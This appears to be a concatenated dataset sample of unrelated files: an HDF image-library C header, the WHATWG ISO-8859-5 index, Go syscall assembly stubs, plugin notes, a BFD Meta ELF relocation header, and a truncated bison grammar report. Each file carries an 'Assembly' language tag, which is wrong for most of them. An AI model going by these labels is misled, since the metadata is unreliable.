** RED, GREEN, BLUE d RGB flags
**
** IMHDFTMPFILE d tmp file for holding stream data
**
** imHdfDD t Data Descriptor entry from an HDF file
**
** imHdfDDList v list of DDs
** imHdfDDListEnd v pointer to end of DD list
** imHdfDDCount v # of entries in DD list
**
** imHdfDDQNEntry m query number of entries in DD list
** imHdfDDQTag m query tag for a DD entry
** imHdfDDQRef m query reference number for a DD entry
** imHdfDDQDataOffset m query data offset for a DD entry
** imHdfDDQDataLength m query data length for a DD entry
** imHdfDDQNext m query next in DD list
** imHdfDDQFirst m query first in DD list
**
** imHdfClt t CLT that has been written out
**
** imHdfCltList v list of CLT's being written out
** imHdfCltListEnd v end of the CLT list
**
** imHdfCltQRefLUT m query LUT reference number for an entry
** imHdfCltQRefLD m query LD reference number for an entry
** imHdfCltQClt m query CLT pointer for an entry
**
** ReadStruct m read a structure
** WriteStruct m write a structure
** Read m read an item
** Write m write an item
** Seek m seek to a file location
** Tell m tell current file locaiton
**
** imHdfByteOrder v data byte order
** imHdfFloatFormat v data float format
** imHdfRef v current reference number
**
** imHdfDim t dimmension information
** imHdfRIG t RIG information collection
**
** PRIVATE CONTENTS
** none
**
** HISTORY
** $Log: imhdfinternal.h,v $
** Revision 1.5 1995/06/29 00:32:03 bduggan
** updated copyright
**
** Revision 1.4 1994/10/03 16:03:03 nadeau
** Updated to ANSI C and C++ compatibility by adding function prototypes.
** Minimized use of custom SDSC types (e.g., uchar vs. unsigned char)
** Changed all macros and defined constants to have names starting with IM.
** Updated copyright message.
**
** Revision 1.3 92/09/02 13:18:52 vle
** Updated copyright notice.
**
** Revision 1.2 91/10/03 13:04:37 nadeau
** Changed 'interlace' to 'interleave'.
**
** Revision 1.1 91/10/03 12:56:45 nadeau
** Initial revision
**
**/
#ifndef __IMHDFINTERNALH__
/*
* CONSTANTS
* IMHDFT* - tag numbers
*
* DESCRIPTION
* Each tag in an HDF file is represented as an unsigned 16-bit number.
* The following #defines are derived from "df.h", an include file
* from the NCSA HDF library source. We can't include "df.h" itself
* here, or we'd have to distribute "df.h" without our source.
*/
#define IMHDFTNULL ((sdsc_uint16)1) /* no data */
/* Utility set */
#define IMHDFTRLE ((sdsc_uint16)11) /* run length encoding */
#define IMHDFTIMC ((sdsc_uint16)12) /* IMCOMP compression */
#define IMHDFTFID ((sdsc_uint16)100) /* File identifier */
#define IMHDFTFD ((sdsc_uint16)101) /* File description */
#define IMHDFTTID ((sdsc_uint16)102) /* Tag identifier */
#define IMHDFTTD ((sdsc_uint16)103) /* Tag descriptor */
#define IMHDFTDIL ((sdsc_uint16)104) /* data identifier label */
#define IMHDFTDIA ((sdsc_uint16)105) /* data identifier annotation */
#define IMHDFTNT ((sdsc_uint16)106) /* number type */
#define IMHDFTMT ((sdsc_uint16)107) /* machine type */
/* Raster-8 set */
#define IMHDFTID8 ((sdsc_uint16)200) /* 8-bit Image dimension */
#define IMHDFTIP8 ((sdsc_uint16)201) /* 8-bit Image palette */
#define IMHDFTRI8 ((sdsc_uint16)202) /* Raster-8 image */
#define IMHDFTCI8 ((sdsc_uint16)203) /* RLE compressed 8-bit image */
#define IMHDFTII8 ((sdsc_uint16)204) /* IMCOMP compressed 8-bit image */
/* Raster Image set */
#define IMHDFTID ((sdsc_uint16)300) /* Image DimRec */
#define IMHDFTLUT ((sdsc_uint16)301) /* Image Palette */
#define IMHDFTRI ((sdsc_uint16)302) /* Raster Image */
#define IMHDFTCI ((sdsc_uint16)303) /* Compressed Image */
#define IMHDFTRIG ((sdsc_uint16)306) /* Raster Image Group */
#define IMHDFTLD ((sdsc_uint16)307) /* Palette DimRec */
#define IMHDFTMD ((sdsc_uint16)308) /* Matte DimRec */
#define IMHDFTMA ((sdsc_uint16)309) /* Matte Data */
#define IMHDFTCCN ((sdsc_uint16)310) /* color correction */
#define IMHDFTCFM ((sdsc_uint16)311) /* color format */
#define IMHDFTAR ((sdsc_uint16)312) /* aspect ratio */
/* Composition set */
#define IMHDFTDRAW ((sdsc_uint16)400) /* Draw these images in sequence */
#define IMHDFTRUN ((sdsc_uint16)401) /* run this as a program/script */
#define IMHDFTXYP ((sdsc_uint16)500) /* x-y position */
#define IMHDFTMTO ((sdsc_uint16)501) /* machine-type override */
/* Tektronix */
#define IMHDFTT14 ((sdsc_uint16)602) /* TEK 4014 data */
#define IMHDFTT105 ((sdsc_uint16)603) /* TEK 4105 data */
/* Scientific Data set */
#define IMHDFTSDG ((sdsc_uint16)700) /* Scientific Data Group */
#define IMHDFTSDD ((sdsc_uint16)701) /* Scientific Data DimRec */
#define IMHDFTSD ((sdsc_uint16)702) /* Scientific Data */
#define IMHDFTSDS ((sdsc_uint16)703) /* Scales */
#define IMHDFTSDL ((sdsc_uint16)704) /* Labels */
#define IMHDFTSDU ((sdsc_uint16)705) /* Units */
#define IMHDFTSDF ((sdsc_uint16)706) /* Formats */
#define IMHDFTSDM ((sdsc_uint16)707) /* Max/Min */
#define IMHDFTSDC ((sdsc_uint16)708) /* Coord sys */
#define IMHDFTSDT ((sdsc_uint16)709) /* Transpose */
/*
* CONSTANTS
* IMHDFNT* - MT and NT values
*
* DESCRIPTION
* The MT (machine type) tag uses the 16-bit reference number field as
* 4 4-bit values broken down in the order (high to low):
*
* unsigned char
* unsigned int
* float
* double
*
* The unsigned char 4-bit field has as a value one of the char class
* codes. Likewise for the unsigned int, float, and double. Class
* code constants have names starting with IMHDFNT* and are the same as
* used by the NT tag.
*
* The NT tag has 4 8-bit values assiciated with it, one of which
* specifies the type being specified (unsigned int, int, etc), and another
* the class code representing the description (its a VAX float, etc).
*/
#define IMHDFNTVERSION 1 /* current version of NT info */
/* Type codes */
#define IMHDFNTUINT 1
#define IMHDFNTINT 2
#define IMHDFNTUCHAR 3
#define IMHDFNTCHAR 4
#define IMHDFNTFLOAT 5
#define IMHDFNTDOUBLE 6
/* Class codes for unsigned int and int. */
#define IMHDFINTMBO 1 /* Motorola byte order 2's compl */
#define IMHDFINTVBO 2 /* Vax byte order 2's compl */
#define IMHDFINTIBO 4 /* Intel byte order 2's compl */
/* Class codes for float and double. */
#define IMHDFFLOATIEEE 1 /* IEEE format */
#define IMHDFFLOATVAX 2 /* Vax format */
#define IMHDFFLOATCRAY 3 /* Cray format */
#define IMHDFFLOATPC 4 /* PC floats - flipped IEEE */
/* Class codes for uchar and char. */
#define IMHDFCHARBYTE 0 /* bitwise/numeric field */
#define IMHDFCHARASCII 1 /* ASCII */
#define IMHDFCHAREBCDIC 5 /* EBCDIC */
/*
* CONSTANTS
* IMHDFC* - color formats
*
* DESCRIPTION
* Color formats are described by character strings in the data for
* the CFM tag. Internally we treat them as the following integer
* constants for quicker comparisons.
*/
#define IMHDFCVALUE 0 /* Pseudo-Color */
#define IMHDFCRGB 1 /* RGB */
#define IMHDFCXYZ 2 /* CIE XYZ */
#define IMHDFCHSV 3 /* Hue-Saturation-Value */
#define IMHDFCHSI 4 /* Hue-Saturation-Intensity */
#define IMHDFCSPECTRAL 5 /* Spectral sampling */
/*
* CONSTANTS
* RED, GREEN, BLUE - RGB flags
*
* DESCRIPTION
* These values are used during run-length encoding and decoding of
* RGB images in order to keep track of the channel value currently
* being handled.
*/
#define BLUE 0
#define GREEN 1
#define RED 2
/*
* DD List Management
*/
/*
* TYPEDEF & STRUCT
* imHdfDD - Data Descriptor entry from an HDF file
*
* DESCRIPTION
* An imHdfDD describes one piece of data in an HDF file. When an HDF
* table of contents is read in, a list of all of the data items in
* the file is made.
*/
typedef struct imHdfDD
{
unsigned int dd_tag; /* Tag number */
unsigned int dd_ref; /* Reference count */
long dd_dataOffset; /* File offset to data */
unsigned int dd_dataLength; /* Length (in bytes) of data */
struct imHdfDD *dd_next; /* Next in linked list */
} imHdfDD;
/*
* GLOBALS
* imHdfDDList - list of DDs
* imHdfDDListEnd - pointer to end of DD list
* imHdfDDCount - # of entries in DD list
*/
extern imHdfDD *imHdfDDList; /* List of DD's */
extern imHdfDD *imHdfDDListEnd; /* Pointer to end of DD list */
extern int imHdfDDCount; /* # of DD's in list */
/*
* MACROS
* imHdfDDQNEntry - query number of entries in DD list
* imHdfDDQTag - query tag for a DD entry
* imHdfDDQRef - query reference number for a DD entry
* imHdfDDQDataOffset - query data offset for a DD entry
* imHdfDDQDataLength - query data length for a DD entry
* imHdfDDQNext - query next in DD list
* imHdfDDQFirst - query first in DD list
*
* DESCRIPTION
* Query stuff from a DD list.
*/
#define imHdfDDQNEntry() (imHdfDDCount)
#define imHdfDDQTag(pDD) (pDD->dd_tag)
#define imHdfDDQRef(pDD) (pDD->dd_ref)
#define imHdfDDQDataOffset(pDD) (pDD->dd_dataOffset)
#define imHdfDDQDataLength(pDD) (pDD->dd_dataLength)
#define imHdfDDQNext(pDD) (pDD->dd_next)
#define imHdfDDQFirst() (imHdfDDList)
/*
* CLT List Management
*/
/*
* TYPEDEF & STRUCT
* imHdfClt - CLT that has been written out
*
* DESCRIPTION
* As CLT's are written out, their pointer, and LD and LUT tag/ref's
* are saved to possibly be included in a future RIG.
*/
typedef struct imHdfClt
{
ImClt *clt_clt; /* CLT pointer */
unsigned int clt_refLUT; /* LUT's ref */
unsigned int clt_refLD; /* LD's ref */
struct imHdfClt *clt_next; /* Next in list */
} imHdfClt;
/*
* GLOBALS
* imHdfCltList - list of CLT's being written out
* imHdfCltListEnd - end of the CLT list
*/
extern imHdfClt *imHdfCltList;
extern imHdfClt *imHdfCltListEnd;
/*
* MACROS
* imHdfCltQRefLUT - query LUT reference number for an entry
* imHdfCltQRefLD - query LD reference number for an entry
* imHdfCltQClt - query CLT pointer for an entry
*
* DESCRIPTION
* Query stuff from an HDF CLT.
*/
#define imHdfCltQRefLUT(pClt) (pClt->clt_refLUT)
#define imHdfCltQRefLD(pClt) (pClt->clt_refLD)
#define imHdfCltQClt(pClt) (pClt->clt_clt)
/*
* MACROS
* ReadStruct - read a structure
* WriteStruct - write a structure
* Read - read an item
* Write - write an item
* Seek - seek to a file location
* Tell - tell current file locaiton
*
* DESCRIPTION
* These macros just cover up the standard I/O calls and return
* a fatal error code. They assume the local variables 'ioType', 'fd',
* and 'fp' exist.
*/
#define ReadStruct(ptr,bin) \
if ( ImBinReadStruct( ioType, fd, fp, (ptr), (bin) ) == -1 ) \
ImReturnBinError( );
#define WriteStruct(ptr,bin) \
if ( ImBinWriteStruct( ioType, fd, fp, (ptr), (bin) ) == -1 ) \
ImReturnBinError( );
#define Read(ptr,type,nbytes,num) \
if ( ImBinRead( ioType, fd, fp, (ptr), (type), (nbytes), (num) )== -1)\
ImReturnBinError( );
#define Write(ptr,type,nbytes,num) \
if ( ImBinWrite( ioType, fd, fp, (ptr), (type), (nbytes), (num) )== -1)\
ImReturnBinError( );
#define Seek(offset) \
ImSeek( ioType, fd, fp, (offset), 0 );
#define Tell() \
ImTell( ioType, fd, fp );
/*
* GLOBALS
* imHdfByteOrder - data byte order
* imHdfFloatFormat - data float format
* imHdfRef - current reference number
*/
extern int imHdfByteOrder; /* Default byte order */
extern int imHdfFloatFormat; /* Default float format */
extern sdsc_uint16 imHdfRef; /* Current reference number */
/*
* TYPEDEF & STRUCT
* imHdfDim - dimmension information
*
* DESCRIPTION
* The ID, LD, and MD tags each use the same structure in an HDF file.
* The each given a width and height. They point to an NT tag to
* indicate how big a channel (red, green, etc) for a pixel is. They
* tell how many channels it takes to make a pixel (3 for RGB) and
* what storage interleave scheme is used for the image. They also point
* to a compression tag to describe the compression scheme.
*
* imHdfDim holds all this information after being read in, or before
* being written out.
*/
typedef struct imHdfDim
{
int dim_width; /* Image width */
int dim_height; /* Image height */
int dim_channelType; /* Type used for channel data */
int dim_channelSize; /* # of bytes per channel */
int dim_channelByteOrder; /* Channel byte order */
int dim_channelFloatFormat; /* Channel float format */
int dim_pixelSize; /* # of channels per pixel */
int dim_interleave; /* Interleave scheme */
int dim_compression; /* Compression scheme */
} imHdfDim;
/*
* TYPEDEF & STRUCT
* imHdfRIG - RIG information collection
*
* DESCRIPTION
* A RIG (raster image group) references several other tags. Much of
* the information these tags point to must be read in and available
* before the image, CLT, and matte image themselves can be read in
* and uncompressed. imHdfRIG is is a repository for this collection of
* information prior to the image being read in.
*/
typedef struct imHdfRIG
{
imHdfDD *rig_dd; /* RIG data descriptor */
/* Image Dimension (ID) info */
imHdfDim *rig_imageDim; /* Image dimension info */
/* Raster Image (RI) info */
imHdfDD *rig_imageDD; /* DD pointing to image */
/* Lookup table Dimension (LD) info */
imHdfDim *rig_cltDim; /* CLT dimension info */
/* LookUp Table (LUT) info */
imHdfDD *rig_cltDD; /* DD pointing to CLT */
/* Matte channel Dimension (MD) info */
imHdfDim *rig_matteDim; /* Matte dimension info */
/* MAtte channel (MA) info */
imHdfDD *rig_matteDD; /* DD pointing to matte */
/* Color CorrectionN (CCN) info */
int rig_ccnGiven; /* Was an CCN tag supplied? */
float rig_gamma; /* Gamma correction factor */
float rig_red[3]; /* XYZ for red */
float rig_green[3]; /* XYZ for green */
float rig_blue[3]; /* XYZ for blue */
float rig_white[3]; /* XYZ for white */
/* Color ForMat (CFM) info */
int rig_colorFormat; /* Color format for image */
/* Aspect Ratio (AR) info */
float rig_aspectRatio; /* Image aspect ratio */
/* Machine Type Override (MTO) info */
struct imHdfRIG *rig_next; /* Next in RIG list */
} imHdfRIG;
/*
* FUNCTIONS
* imHdf* - private functions to imhdfread.c and imhdfwrite.c
*/
#ifdef __STDC__
extern void imHdfDDEmpty(void );
extern imHdfDD *imHdfDDAppend(unsigned int tag, unsigned int ref, long dataOffset, long dataLength );
extern imHdfDD *imHdfDDFind(unsigned int tag, unsigned int ref );
extern void imHdfCltEmpty( void );
extern imHdfClt *imHdfCltAppend( ImClt* clt, unsigned int refLUT, unsigned int refLD);
extern imHdfClt *imHdfCltFind( ImClt * clt );
extern imHdfClt *imHdfCltFindRef( unsigned int ref);
#else
extern void imHdfDDEmpty( );
extern imHdfDD *imHdfDDAppend( );
extern imHdfDD *imHdfDDFind( );
extern void imHdfCltEmpty( );
extern imHdfClt *imHdfCltAppend( );
extern imHdfClt *imHdfCltFind( );
extern imHdfClt *imHdfCltFindRef( );
#endif
#endif /* __IMHDFINTERNALH__ */
| {
"language": "Assembly"
} |
# For details on index index-iso-8859-5.txt see the Encoding Standard
# https://encoding.spec.whatwg.org/
#
# Identifier: fa9b1f3f5242df43e2e7bca80e9b6997c67944f20a4af91ee06bacc4e132d9c9
# Date: 2018-01-06
0 0x0080 (<control>)
1 0x0081 (<control>)
2 0x0082 (<control>)
3 0x0083 (<control>)
4 0x0084 (<control>)
5 0x0085
(<control>)
6 0x0086 (<control>)
7 0x0087 (<control>)
8 0x0088 (<control>)
9 0x0089 (<control>)
10 0x008A (<control>)
11 0x008B (<control>)
12 0x008C (<control>)
13 0x008D (<control>)
14 0x008E (<control>)
15 0x008F (<control>)
16 0x0090 (<control>)
17 0x0091 (<control>)
18 0x0092 (<control>)
19 0x0093 (<control>)
20 0x0094 (<control>)
21 0x0095 (<control>)
22 0x0096 (<control>)
23 0x0097 (<control>)
24 0x0098 (<control>)
25 0x0099 (<control>)
26 0x009A (<control>)
27 0x009B (<control>)
28 0x009C (<control>)
29 0x009D (<control>)
30 0x009E (<control>)
31 0x009F (<control>)
32 0x00A0 (NO-BREAK SPACE)
33 0x0401 Ё (CYRILLIC CAPITAL LETTER IO)
34 0x0402 Ђ (CYRILLIC CAPITAL LETTER DJE)
35 0x0403 Ѓ (CYRILLIC CAPITAL LETTER GJE)
36 0x0404 Є (CYRILLIC CAPITAL LETTER UKRAINIAN IE)
37 0x0405 Ѕ (CYRILLIC CAPITAL LETTER DZE)
38 0x0406 І (CYRILLIC CAPITAL LETTER BYELORUSSIAN-UKRAINIAN I)
39 0x0407 Ї (CYRILLIC CAPITAL LETTER YI)
40 0x0408 Ј (CYRILLIC CAPITAL LETTER JE)
41 0x0409 Љ (CYRILLIC CAPITAL LETTER LJE)
42 0x040A Њ (CYRILLIC CAPITAL LETTER NJE)
43 0x040B Ћ (CYRILLIC CAPITAL LETTER TSHE)
44 0x040C Ќ (CYRILLIC CAPITAL LETTER KJE)
45 0x00AD (SOFT HYPHEN)
46 0x040E Ў (CYRILLIC CAPITAL LETTER SHORT U)
47 0x040F Џ (CYRILLIC CAPITAL LETTER DZHE)
48 0x0410 А (CYRILLIC CAPITAL LETTER A)
49 0x0411 Б (CYRILLIC CAPITAL LETTER BE)
50 0x0412 В (CYRILLIC CAPITAL LETTER VE)
51 0x0413 Г (CYRILLIC CAPITAL LETTER GHE)
52 0x0414 Д (CYRILLIC CAPITAL LETTER DE)
53 0x0415 Е (CYRILLIC CAPITAL LETTER IE)
54 0x0416 Ж (CYRILLIC CAPITAL LETTER ZHE)
55 0x0417 З (CYRILLIC CAPITAL LETTER ZE)
56 0x0418 И (CYRILLIC CAPITAL LETTER I)
57 0x0419 Й (CYRILLIC CAPITAL LETTER SHORT I)
58 0x041A К (CYRILLIC CAPITAL LETTER KA)
59 0x041B Л (CYRILLIC CAPITAL LETTER EL)
60 0x041C М (CYRILLIC CAPITAL LETTER EM)
61 0x041D Н (CYRILLIC CAPITAL LETTER EN)
62 0x041E О (CYRILLIC CAPITAL LETTER O)
63 0x041F П (CYRILLIC CAPITAL LETTER PE)
64 0x0420 Р (CYRILLIC CAPITAL LETTER ER)
65 0x0421 С (CYRILLIC CAPITAL LETTER ES)
66 0x0422 Т (CYRILLIC CAPITAL LETTER TE)
67 0x0423 У (CYRILLIC CAPITAL LETTER U)
68 0x0424 Ф (CYRILLIC CAPITAL LETTER EF)
69 0x0425 Х (CYRILLIC CAPITAL LETTER HA)
70 0x0426 Ц (CYRILLIC CAPITAL LETTER TSE)
71 0x0427 Ч (CYRILLIC CAPITAL LETTER CHE)
72 0x0428 Ш (CYRILLIC CAPITAL LETTER SHA)
73 0x0429 Щ (CYRILLIC CAPITAL LETTER SHCHA)
74 0x042A Ъ (CYRILLIC CAPITAL LETTER HARD SIGN)
75 0x042B Ы (CYRILLIC CAPITAL LETTER YERU)
76 0x042C Ь (CYRILLIC CAPITAL LETTER SOFT SIGN)
77 0x042D Э (CYRILLIC CAPITAL LETTER E)
78 0x042E Ю (CYRILLIC CAPITAL LETTER YU)
79 0x042F Я (CYRILLIC CAPITAL LETTER YA)
80 0x0430 а (CYRILLIC SMALL LETTER A)
81 0x0431 б (CYRILLIC SMALL LETTER BE)
82 0x0432 в (CYRILLIC SMALL LETTER VE)
83 0x0433 г (CYRILLIC SMALL LETTER GHE)
84 0x0434 д (CYRILLIC SMALL LETTER DE)
85 0x0435 е (CYRILLIC SMALL LETTER IE)
86 0x0436 ж (CYRILLIC SMALL LETTER ZHE)
87 0x0437 з (CYRILLIC SMALL LETTER ZE)
88 0x0438 и (CYRILLIC SMALL LETTER I)
89 0x0439 й (CYRILLIC SMALL LETTER SHORT I)
90 0x043A к (CYRILLIC SMALL LETTER KA)
91 0x043B л (CYRILLIC SMALL LETTER EL)
92 0x043C м (CYRILLIC SMALL LETTER EM)
93 0x043D н (CYRILLIC SMALL LETTER EN)
94 0x043E о (CYRILLIC SMALL LETTER O)
95 0x043F п (CYRILLIC SMALL LETTER PE)
96 0x0440 р (CYRILLIC SMALL LETTER ER)
97 0x0441 с (CYRILLIC SMALL LETTER ES)
98 0x0442 т (CYRILLIC SMALL LETTER TE)
99 0x0443 у (CYRILLIC SMALL LETTER U)
100 0x0444 ф (CYRILLIC SMALL LETTER EF)
101 0x0445 х (CYRILLIC SMALL LETTER HA)
102 0x0446 ц (CYRILLIC SMALL LETTER TSE)
103 0x0447 ч (CYRILLIC SMALL LETTER CHE)
104 0x0448 ш (CYRILLIC SMALL LETTER SHA)
105 0x0449 щ (CYRILLIC SMALL LETTER SHCHA)
106 0x044A ъ (CYRILLIC SMALL LETTER HARD SIGN)
107 0x044B ы (CYRILLIC SMALL LETTER YERU)
108 0x044C ь (CYRILLIC SMALL LETTER SOFT SIGN)
109 0x044D э (CYRILLIC SMALL LETTER E)
110 0x044E ю (CYRILLIC SMALL LETTER YU)
111 0x044F я (CYRILLIC SMALL LETTER YA)
112 0x2116 № (NUMERO SIGN)
113 0x0451 ё (CYRILLIC SMALL LETTER IO)
114 0x0452 ђ (CYRILLIC SMALL LETTER DJE)
115 0x0453 ѓ (CYRILLIC SMALL LETTER GJE)
116 0x0454 є (CYRILLIC SMALL LETTER UKRAINIAN IE)
117 0x0455 ѕ (CYRILLIC SMALL LETTER DZE)
118 0x0456 і (CYRILLIC SMALL LETTER BYELORUSSIAN-UKRAINIAN I)
119 0x0457 ї (CYRILLIC SMALL LETTER YI)
120 0x0458 ј (CYRILLIC SMALL LETTER JE)
121 0x0459 љ (CYRILLIC SMALL LETTER LJE)
122 0x045A њ (CYRILLIC SMALL LETTER NJE)
123 0x045B ћ (CYRILLIC SMALL LETTER TSHE)
124 0x045C ќ (CYRILLIC SMALL LETTER KJE)
125 0x00A7 § (SECTION SIGN)
126 0x045E ў (CYRILLIC SMALL LETTER SHORT U)
127 0x045F џ (CYRILLIC SMALL LETTER DZHE)
| {
"language": "Assembly"
} |
// Copyright 2012 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// +build !gccgo
#include "textflag.h"
//
// System call support for ARM, FreeBSD
//
// Just jump to package syscall's implementation for all these functions.
// The runtime may know about them.
TEXT ·Syscall(SB),NOSPLIT,$0-28
B syscall·Syscall(SB)
TEXT ·Syscall6(SB),NOSPLIT,$0-40
B syscall·Syscall6(SB)
TEXT ·Syscall9(SB),NOSPLIT,$0-52
B syscall·Syscall9(SB)
TEXT ·RawSyscall(SB),NOSPLIT,$0-28
B syscall·RawSyscall(SB)
TEXT ·RawSyscall6(SB),NOSPLIT,$0-40
B syscall·RawSyscall6(SB)
| {
"language": "Assembly"
} |
We have a list of plugins.
In any particular context, some plugins are enabled.
DetectorFactoryCollection:
Core plugin
Collection of plugins
Collection of DetectorFactories
Adjustment ranker
I18N
ResourceBundles
bugPatternMap
bugCodeMap
categoryDescriptionMap
Plugin
collection of DetectorFactory
bug patterns, codes, etc.
component plugins
bug ranker
enabled
plugin loader
CloudFactory
registeredClouds
| {
"language": "Assembly"
} |
/* Meta ELF support for BFD.
Copyright (C) 2013-2020 Free Software Foundation, Inc.
Contributed by Imagination Technologies Ltd.
This file is part of BFD, the Binary File Descriptor library.
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software Foundation,
Inc., 51 Franklin Street - Fifth Floor, Boston, MA 02110-1301, USA. */
#ifndef _ELF_METAG_H
#define _ELF_METAG_H
#include "elf/reloc-macros.h"
/* Relocation types. */
START_RELOC_NUMBERS (elf_metag_reloc_type)
RELOC_NUMBER (R_METAG_HIADDR16, 0)
RELOC_NUMBER (R_METAG_LOADDR16, 1)
RELOC_NUMBER (R_METAG_ADDR32, 2)
RELOC_NUMBER (R_METAG_NONE, 3)
RELOC_NUMBER (R_METAG_RELBRANCH, 4)
RELOC_NUMBER (R_METAG_GETSETOFF, 5)
/* Backward compatability */
RELOC_NUMBER (R_METAG_REG32OP1, 6)
RELOC_NUMBER (R_METAG_REG32OP2, 7)
RELOC_NUMBER (R_METAG_REG32OP3, 8)
RELOC_NUMBER (R_METAG_REG16OP1, 9)
RELOC_NUMBER (R_METAG_REG16OP2, 10)
RELOC_NUMBER (R_METAG_REG16OP3, 11)
RELOC_NUMBER (R_METAG_REG32OP4, 12)
RELOC_NUMBER (R_METAG_HIOG, 13)
RELOC_NUMBER (R_METAG_LOOG, 14)
RELOC_NUMBER (R_METAG_REL8, 15)
RELOC_NUMBER (R_METAG_REL16, 16)
/* GNU */
RELOC_NUMBER (R_METAG_GNU_VTINHERIT,30)
RELOC_NUMBER (R_METAG_GNU_VTENTRY, 31)
/* PIC relocations */
RELOC_NUMBER (R_METAG_HI16_GOTOFF, 32)
RELOC_NUMBER (R_METAG_LO16_GOTOFF, 33)
RELOC_NUMBER (R_METAG_GETSET_GOTOFF,34)
RELOC_NUMBER (R_METAG_GETSET_GOT, 35)
RELOC_NUMBER (R_METAG_HI16_GOTPC, 36)
RELOC_NUMBER (R_METAG_LO16_GOTPC, 37)
RELOC_NUMBER (R_METAG_HI16_PLT, 38)
RELOC_NUMBER (R_METAG_LO16_PLT, 39)
RELOC_NUMBER (R_METAG_RELBRANCH_PLT,40)
RELOC_NUMBER (R_METAG_GOTOFF, 41)
RELOC_NUMBER (R_METAG_PLT, 42)
RELOC_NUMBER (R_METAG_COPY, 43)
RELOC_NUMBER (R_METAG_JMP_SLOT, 44)
RELOC_NUMBER (R_METAG_RELATIVE, 45)
RELOC_NUMBER (R_METAG_GLOB_DAT, 46)
/* TLS relocations */
RELOC_NUMBER (R_METAG_TLS_GD, 47)
RELOC_NUMBER (R_METAG_TLS_LDM, 48)
RELOC_NUMBER (R_METAG_TLS_LDO_HI16, 49)
RELOC_NUMBER (R_METAG_TLS_LDO_LO16, 50)
RELOC_NUMBER (R_METAG_TLS_LDO, 51)
RELOC_NUMBER (R_METAG_TLS_IE, 52)
RELOC_NUMBER (R_METAG_TLS_IENONPIC, 53)
RELOC_NUMBER (R_METAG_TLS_IENONPIC_HI16,54)
RELOC_NUMBER (R_METAG_TLS_IENONPIC_LO16,55)
RELOC_NUMBER (R_METAG_TLS_TPOFF, 56)
RELOC_NUMBER (R_METAG_TLS_DTPMOD, 57)
RELOC_NUMBER (R_METAG_TLS_DTPOFF, 58)
RELOC_NUMBER (R_METAG_TLS_LE, 59)
RELOC_NUMBER (R_METAG_TLS_LE_HI16, 60)
RELOC_NUMBER (R_METAG_TLS_LE_LO16, 61)
END_RELOC_NUMBERS (R_METAG_MAX)
#endif /* _ELF_METAG_H */
| {
"language": "Assembly"
} |
Terminals unused in grammar
rshifI
cbr
l
Rules useless in parser due to conflicts
2 p0: $@1 p
State 4 conflicts: 1 shift/reduce
Grammar
0 $accept: p0 add
1 $@1: /* empty */
2 p0: $@1 p
3 p: p i
4 | /* empty */
5 i: i_2_1
6 | i_1_1
7 | i_1_2
8 | i_0_1
9 | i_2_0
10 i_2_1: op r comma r to r
11 | op r comma constant to r
12 i_1_1: op r to r
13 | op constant to r
14 i_1_2: op r to r comma r
15 i_0_1: op r
16 i_2_0: op r comma r
17 op: add
18 | sub
19 | mult
20 | _div
21 | inv
22 | addI
23 | subI
24 | multI
25 | divI
26 | rdivI
27 | and
28 | andI
29 | or
30 | orI
31 | xor
32 | xorI
33 | lshift
34 | lshiftI
35 | rshift
36 | load
37 | loadAI
38 | loadA0
39 | cload
40 | cloadAI
41 | cloadA0
42 | store
43 | storeAI
44 | storeA0
45 | cstore
46 | cstoreAI
47 | cstoreA0
48 | i2i
49 | c2c
50 | c2i
51 | i2c
52 | cmp_LT
53 | cmp_LE
54 | cmp_EQ
55 | cmp_GE
56 | cmp_GT
57 | cmp_NE
58 | jump
59 | jumpI
60 | nop
61 | tbl
62 | loadI
63 | inc
64 | dec
Terminals, with rules where they appear
add (0) 0 17
sub (1) 18
mult (2) 19
_div (3) 20
inv (4) 21
addI (5) 22
subI (6) 23
multI (7) 24
divI (8) 25
rdivI (9) 26
and (10) 27
andI (11) 28
or (12) 29
orI (13) 30
xor (14) 31
xorI (15) 32
lshift (16) 33
rshift (17) 35
lshiftI (18) 34
rshifI (19)
load (20) 36
loadAI (21) 37
loadA0 (22) 38
loadI (23) 62
cload (24) 39
cloadAI (25) 40
cloadA0 (26) 41
store (27) 42
storeAI (28) 43
storeA0 (29) 44
cstore (30) 45
cstoreAI (31) 46
cstoreA0 (32) 47
i2i (33) 48
c2c (34) 49
c2i (35) 50
i2c (36) 51
cmp_LT (37) 52
cmp_LE (38) 53
cmp_EQ (39) 54
cmp_GE (40) 55
cmp_GT (41) 56
cmp_NE (42) 57
cbr (43)
jump (44) 58
jumpI (45) 59
nop (46) 60
tbl (47) 61
inc (48) 63
dec (49) 64
r (100) 10 11 12 13 14 15 16
l (101)
constant (102) 11 13
comma (103) 10 11 14 16
to (104) 10 11 12 13 14
error (256)
Nonterminals, with rules where they appear
$accept (57)
on left: 0
p0 (58)
on left: 2, on right: 0
$@1 (59)
on left: 1, on right: 2
p (60)
on left: 3 4, on right: 2 3
i (61)
on left: 5 6 7 8 9, on right: 3
i_2_1 (62)
on left: 10 11, on right: 5
i_1_1 (63)
on left: 12 13, on right: 6
i_1_2 (64)
on left: 14, on right: 7
i_0_1 (65)
on left: 15, on right: 8
i_2_0 (66)
on left: 16, on right: 9
op (67)
on left: 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34
35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55
56 57 58 59 60 61 62 63 64, on right: 10 11 12 13 14 15 16
state 0
0 $accept: . p0 add
$default reduce using rule 1 ($@1)
p0 go to state 1
$@1 go to state 2
state 1
0 $accept: p0 . add
add shift, and go to state 3
state 2
2 p0: $@1 . p
$default reduce using rule 4 (p)
p go to state 4
state 3
0 $accept: p0 add .
$default accept
state 4
2 p0: $@1 p .
3 p: p . i
add shift, and go to state 5
sub shift, and go to state 6
mult shift, and go to state 7
_div shift, and go to state 8
inv shift, and go to state 9
addI shift, and go to state 10
subI shift, and go to state 11
multI shift, and go to state 12
divI shift, and go to state 13
rdivI shift, and go to state 14
and shift, and go to state 15
andI shift, and go to state 16
or shift, and go to state 17
orI shift, and go to state 18
xor shift, and go to state 19
xorI shift, and go to state 20
lshift shift, and go to state 21
rshift shift, and go to state 22
